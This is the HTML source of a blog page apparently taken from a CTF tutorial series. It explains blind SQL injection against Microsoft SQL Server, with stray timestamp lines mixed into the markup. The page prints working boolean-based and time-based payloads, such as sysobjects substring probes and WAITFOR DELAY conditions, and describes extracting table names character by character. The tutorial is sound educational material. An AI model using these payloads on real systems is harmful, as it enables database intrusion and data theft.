2024-05-05 23:31:00 +08:00
<!DOCTYPE HTML>
2024-09-09 00:08:19 +08:00
< html lang = "en" class = "coal" dir = "ltr" >
2024-05-05 23:31:00 +08:00
< head >
<!-- Book generated using mdBook -->
< meta charset = "UTF-8" >
< title > Blind SQL Injection - Andrew' s Blog< / title >
<!-- Custom HTML head -->
< meta name = "description" content = "Andrew Ryan's Blog" >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
2024-09-09 00:08:19 +08:00
< meta name = "theme-color" content = "#ffffff" >
2024-05-05 23:31:00 +08:00
< link rel = "icon" href = "../../favicon.svg" >
< link rel = "shortcut icon" href = "../../favicon.png" >
< link rel = "stylesheet" href = "../../css/variables.css" >
< link rel = "stylesheet" href = "../../css/general.css" >
< link rel = "stylesheet" href = "../../css/chrome.css" >
<!-- Fonts -->
< link rel = "stylesheet" href = "../../FontAwesome/css/font-awesome.css" >
< link rel = "stylesheet" href = "../../fonts/fonts.css" >
<!-- Highlight.js Stylesheets -->
< link rel = "stylesheet" href = "../../highlight.css" >
< link rel = "stylesheet" href = "../../tomorrow-night.css" >
< link rel = "stylesheet" href = "../../ayu-highlight.css" >
<!-- Custom theme stylesheets -->
< link rel = "stylesheet" href = "../../src/style/custom.css" >
<!-- MathJax -->
< script async src = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" > < / script >
< / head >
2024-09-09 00:08:19 +08:00
< body class = "sidebar-visible no-js" >
2024-05-05 23:31:00 +08:00
< div id = "body-container" >
<!-- Provide site root to javascript -->
< script >
var path_to_root = "../../";
var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "coal" : "coal";
< / script >
<!-- Work around some values being stored in localStorage wrapped in quotes -->
< script >
try {
var theme = localStorage.getItem('mdbook-theme');
var sidebar = localStorage.getItem('mdbook-sidebar');
if (theme.startsWith('"') & & theme.endsWith('"')) {
localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
}
if (sidebar.startsWith('"') & & sidebar.endsWith('"')) {
localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
}
} catch (e) { }
< / script >
<!-- Set the theme before any content is loaded, prevents flash -->
< script >
var theme;
try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
if (theme === null || theme === undefined) { theme = default_theme; }
var html = document.querySelector('html');
html.classList.remove('coal')
html.classList.add(theme);
2024-09-09 00:08:19 +08:00
var body = document.querySelector('body');
body.classList.remove('no-js')
body.classList.add('js');
2024-05-05 23:31:00 +08:00
< / script >
2024-09-09 00:08:19 +08:00
< input type = "checkbox" id = "sidebar-toggle-anchor" class = "hidden" >
2024-05-05 23:31:00 +08:00
<!-- Hide / unhide sidebar before it is displayed -->
< script >
2024-09-09 00:08:19 +08:00
var body = document.querySelector('body');
2024-05-05 23:31:00 +08:00
var sidebar = null;
2024-09-09 00:08:19 +08:00
var sidebar_toggle = document.getElementById("sidebar-toggle-anchor");
2024-05-05 23:31:00 +08:00
if (document.body.clientWidth >= 1080) {
try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
sidebar = sidebar || 'visible';
} else {
sidebar = 'hidden';
}
2024-09-09 00:08:19 +08:00
sidebar_toggle.checked = sidebar === 'visible';
body.classList.remove('sidebar-visible');
body.classList.add("sidebar-" + sidebar);
2024-05-05 23:31:00 +08:00
< / script >
< nav id = "sidebar" class = "sidebar" aria-label = "Table of contents" >
< div class = "sidebar-scrollbox" >
2024-09-09 00:08:19 +08:00
< ol class = "chapter" > < li class = "chapter-item affix " > < a href = "../../index.html" > Andrew's Blog< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/linux.html" > < strong aria-hidden = "true" > 1.< / strong > Linux< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/linux/install_linux.html" > < strong aria-hidden = "true" > 1.1.< / strong > install linux< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/bash_profile.html" > < strong aria-hidden = "true" > 1.2.< / strong > bash profile< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/command_list.html" > < strong aria-hidden = "true" > 1.3.< / strong > command list< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/git_guide.html" > < strong aria-hidden = "true" > 1.4.< / strong > git guide< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/linux/tar.html" > < strong aria-hidden = "true" > 1.5.< / strong > tar< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/mac/mac.html" > < strong aria-hidden = "true" > 2.< / strong > MacOS< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/mac/macos_profiles.html" > < strong aria-hidden = "true" > 2.1.< / strong > macos profiles< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift.html" > < strong aria-hidden = "true" > 3.< / strong > Swift< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/swift/learn_swift.html" > < strong aria-hidden = "true" > 3.1.< / strong > learn swift basics< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift_extensions.html" > < strong aria-hidden = "true" > 3.2.< / strong > Swift extensions< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swiftui_extension.html" > < strong aria-hidden = "true" > 3.3.< / strong > SwiftUI extensions< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/install_swift.html" > < strong aria-hidden = "true" > 3.4.< / strong > install swift< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/task_planner.html" > < strong aria-hidden = "true" > 3.5.< / strong > implment task panner app with SwiftUI< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift_cheat_sheet.html" > < strong aria-hidden = "true" > 3.6.< / strong > Swift Cheat Sheet< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/yinci_url.html" > < strong aria-hidden = "true" > 3.7.< / strong > Personal privacy protocol< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swift_regular_exressions.html" > < strong aria-hidden = "true" > 3.8.< / strong > Swift regular exressions< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/ios/how_to_create_beautiful_ios_charts_in_swift.html" > < strong aria-hidden = "true" > 3.9.< / strong > How to Create Beautiful iOS Charts in < / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/swiftui_source_code.html" > < strong aria-hidden = "true" > 3.10.< / strong > SwiftUI source code< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/swift/use_swift_fetch_iciba_api.html" > < strong aria-hidden = "true" > 3.11.< / strong > use swift fetch iciba API< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/ios/ios.html" > < strong aria-hidden = "true" > 4.< / strong > iOS< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/ios/cocaposd_setup_and_install_for_ios_project.html" > < strong aria-hidden = "true" > 4.1.< / strong > cocaposd setup and install for ios project< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/ios/swiftui_show_gif_image.html" > < strong aria-hidden = "true" > 4.2.< / strong > SwiftUI show gif image< / a > < / li > < li class = "chapter-item " > < a href = "../../posts/ios/implement_task_planner_app.html" > < strong aria-hidden = "true" > 4.3.< / strong > implement Task planner App< / a > < / li > < / ol > < / li > < li class = "chapter-item " > < a href = "../../posts/objective_c/objective_c.html" > < strong aria-hidden = "true" > 5.< / strong > Objective-C< / a > < a class = "toggle" > < div > ❱< / div > < / a > < / li > < li > < ol class = "section" > < li class = "chapter-item " > < a href = "../../posts/objective_c/objective_c_cheat_she
2024-05-05 23:31:00 +08:00
< / div >
< div id = "sidebar-resize-handle" class = "sidebar-resize-handle" > < / div >
< / nav >
<!-- Track and set sidebar scroll position -->
< script >
var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
sidebarScrollbox.addEventListener('click', function(e) {
if (e.target.tagName === 'A') {
sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
}
}, { passive: true });
var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
sessionStorage.removeItem('sidebar-scroll');
if (sidebarScrollTop) {
// preserve sidebar scroll position when navigating via links within sidebar
sidebarScrollbox.scrollTop = sidebarScrollTop;
} else {
// scroll sidebar to current active section when navigating via "next/previous chapter" buttons
var activeSection = document.querySelector('#sidebar .active');
if (activeSection) {
activeSection.scrollIntoView({ block: 'center' });
}
}
< / script >
< div id = "page-wrapper" class = "page-wrapper" >
< div class = "page" >
< div id = "menu-bar-hover-placeholder" > < / div >
< div id = "menu-bar" class = "menu-bar sticky" >
< div class = "left-buttons" >
2024-09-09 00:08:19 +08:00
< label id = "sidebar-toggle" class = "icon-button" for = "sidebar-toggle-anchor" title = "Toggle Table of Contents" aria-label = "Toggle Table of Contents" aria-controls = "sidebar" >
2024-05-05 23:31:00 +08:00
< i class = "fa fa-bars" > < / i >
2024-09-09 00:08:19 +08:00
< / label >
2024-05-05 23:31:00 +08:00
< button id = "theme-toggle" class = "icon-button" type = "button" title = "Change theme" aria-label = "Change theme" aria-haspopup = "true" aria-expanded = "false" aria-controls = "theme-list" >
< i class = "fa fa-paint-brush" > < / i >
< / button >
< ul id = "theme-list" class = "theme-popup" aria-label = "Themes" role = "menu" >
< li role = "none" > < button role = "menuitem" class = "theme" id = "light" > Light< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "rust" > Rust< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "coal" > Coal< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "navy" > Navy< / button > < / li >
< li role = "none" > < button role = "menuitem" class = "theme" id = "ayu" > Ayu< / button > < / li >
< / ul >
< button id = "search-toggle" class = "icon-button" type = "button" title = "Search. (Shortkey: s)" aria-label = "Toggle Searchbar" aria-expanded = "false" aria-keyshortcuts = "S" aria-controls = "searchbar" >
< i class = "fa fa-search" > < / i >
< / button >
< / div >
< h1 class = "menu-title" > Andrew' s Blog< / h1 >
< div class = "right-buttons" >
< a href = "https://gitee.com/dnrops/dnrops" title = "Git repository" aria-label = "Git repository" >
< i id = "git-repository-button" class = "fa fa-github" > < / i >
< / a >
< / div >
< / div >
< div id = "search-wrapper" class = "hidden" >
< form id = "searchbar-outer" class = "searchbar-outer" >
< input type = "search" id = "searchbar" name = "searchbar" placeholder = "Search this book ..." aria-controls = "searchresults-outer" aria-describedby = "searchresults-header" >
< / form >
< div id = "searchresults-outer" class = "searchresults-outer hidden" >
< div id = "searchresults-header" class = "searchresults-header" > < / div >
< ul id = "searchresults" >
< / ul >
< / div >
< / div >
<!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
< script >
document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
});
< / script >
< div id = "content" class = "content" >
< main >
< h1 id = "blind-sql-injection" > < a class = "header" href = "#blind-sql-injection" > Blind SQL injection< / a > < / h1 >
2024-09-09 00:08:19 +08:00
< p > Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.< / p >
2024-05-05 23:31:00 +08:00
< h2 id = "boolean-based-blind-sql-injection" > < a class = "header" href = "#boolean-based-blind-sql-injection" > boolean-based blind SQL injection< / a > < / h2 >
< pre > < code class = "language-sql" > SELECT * FROM products WHERE id = product_id
< / code > < / pre >
< p > At first, a malicious hacker uses the application in a legitimate way to discover at least one existing product ID – ’ < / p >
< pre > < code class = "language-sql" > 42 AND 1=1
42 AND 1=0
< / code > < / pre >
< p > If this query is executed in the application using simple string concatenation, the query becomes respectively:< / p >
< pre > < code class = "language-sql" > SELECT * FROM products WHERE id = 42 and 1=1
SELECT * FROM products WHERE id = 42 and 1=0
< / code > < / pre >
2024-09-09 00:08:19 +08:00
< p > If the application behaves differently in each case, it is susceptible to boolean-based blind SQL injections.
If the database server is Microsoft SQL Server, the attacker can now supply the following value for product_id:< / p >
2024-05-05 23:31:00 +08:00
< pre > < code class = "language-sql" > 42 AND (SELECT TOP 1 substring(name, 1, 1)
2024-09-09 00:08:19 +08:00
FROM sysobjects
WHERE id=(SELECT TOP 1 id
FROM (SELECT TOP 1 id
FROM sysobjects
ORDER BY id)
AS subq
ORDER BY id DESC)) = 'a'
2024-05-05 23:31:00 +08:00
< / code > < / pre >
< p > As a result, the sub-query in parentheses after 42 AND checks whether the name of the first table in the database starts with the letter a. If true, the application will behave the same as for the payload 42 AND 1=1. If false, the application will behave the same as for the payload 42 AND 1=0.< / p >
< h2 id = "time-based-blind-sql-injection" > < a class = "header" href = "#time-based-blind-sql-injection" > time-based blind SQL injection< / a > < / h2 >
< pre > < code class = "language-sql" > SELECT * FROM products WHERE id = product_id
< / code > < / pre >
< p > A malicious hacker may provide the following product_id value:< / p >
< pre > < code class = "language-sql" > 42; WAITFOR DELAY '0:0:10'
< / code > < / pre >
< p > As a result, the query becomes:< / p >
< pre > < code class = "language-sql" > SELECT * FROM products WHERE id = 1; WAITFOR DELAY '0:0:10'
< / code > < / pre >
2024-09-09 00:08:19 +08:00
< p > If the database server is Microsoft SQL Server and the application is susceptible to time-based blind SQL injections, the attacker will see a 10-second delay in the application.
Now that the attacker knows that time-based blind SQL injections are possible, they can provide the following product_id:< / p >
2024-05-05 23:31:00 +08:00
< pre > < code class = "language-sql" > 42; IF(EXISTS(SELECT TOP 1 *
2024-09-09 00:08:19 +08:00
FROM sysobjects
WHERE id=(SELECT TOP 1 id
FROM (SELECT TOP 1 id
FROM sysobjects
ORDER BY id)
AS subq
ORDER BY id DESC)
AND ascii(lower(substring(name, 1, 1))) = 'a'))
WAITFOR DELAY '0:0:10'
2024-05-05 23:31:00 +08:00
< / code > < / pre >
< p > If the name of the first table in the database structure begins with the letter a, the second part of this query will be true, and the application will react with a 10-second delay. Just like for boolean-based blind SQL injections above, the attacker can use this method repeatedly to discover the name of the first table in the database structure, then try to get more data about the table structure of this table and finally extract data from the table.< / p >
< / main >
< nav class = "nav-wrapper" aria-label = "Page navigation" >
<!-- Mobile navigation buttons -->
< a rel = "prev" href = "../../posts/ctf/1.2_SQL_injection_UNION_attacks.html" class = "mobile-nav-chapters previous" title = "Previous chapter" aria-label = "Previous chapter" aria-keyshortcuts = "Left" >
< i class = "fa fa-angle-left" > < / i >
< / a >
2024-09-09 00:08:19 +08:00
< a rel = "next prefetch" href = "../../posts/ctf/1.4_Code Injection.html" class = "mobile-nav-chapters next" title = "Next chapter" aria-label = "Next chapter" aria-keyshortcuts = "Right" >
2024-05-05 23:31:00 +08:00
< i class = "fa fa-angle-right" > < / i >
< / a >
< div style = "clear: both" > < / div >
< / nav >
< / div >
< / div >
< nav class = "nav-wide-wrapper" aria-label = "Page navigation" >
< a rel = "prev" href = "../../posts/ctf/1.2_SQL_injection_UNION_attacks.html" class = "nav-chapters previous" title = "Previous chapter" aria-label = "Previous chapter" aria-keyshortcuts = "Left" >
< i class = "fa fa-angle-left" > < / i >
< / a >
2024-09-09 00:08:19 +08:00
< a rel = "next prefetch" href = "../../posts/ctf/1.4_Code Injection.html" class = "nav-chapters next" title = "Next chapter" aria-label = "Next chapter" aria-keyshortcuts = "Right" >
2024-05-05 23:31:00 +08:00
< i class = "fa fa-angle-right" > < / i >
< / a >
< / nav >
< / div >
< script >
window.playground_line_numbers = true;
< / script >
< script >
window.playground_copyable = true;
< / script >
< script src = "../../ace.js" > < / script >
< script src = "../../editor.js" > < / script >
< script src = "../../mode-rust.js" > < / script >
< script src = "../../theme-dawn.js" > < / script >
< script src = "../../theme-tomorrow_night.js" > < / script >
< script src = "../../elasticlunr.min.js" > < / script >
< script src = "../../mark.min.js" > < / script >
< script src = "../../searcher.js" > < / script >
< script src = "../../clipboard.min.js" > < / script >
< script src = "../../highlight.js" > < / script >
< script src = "../../book.js" > < / script >
<!-- Custom JS scripts -->
< script src = "../../src/js/custom.js" > < / script >
< / div >
< / body >
< / html >
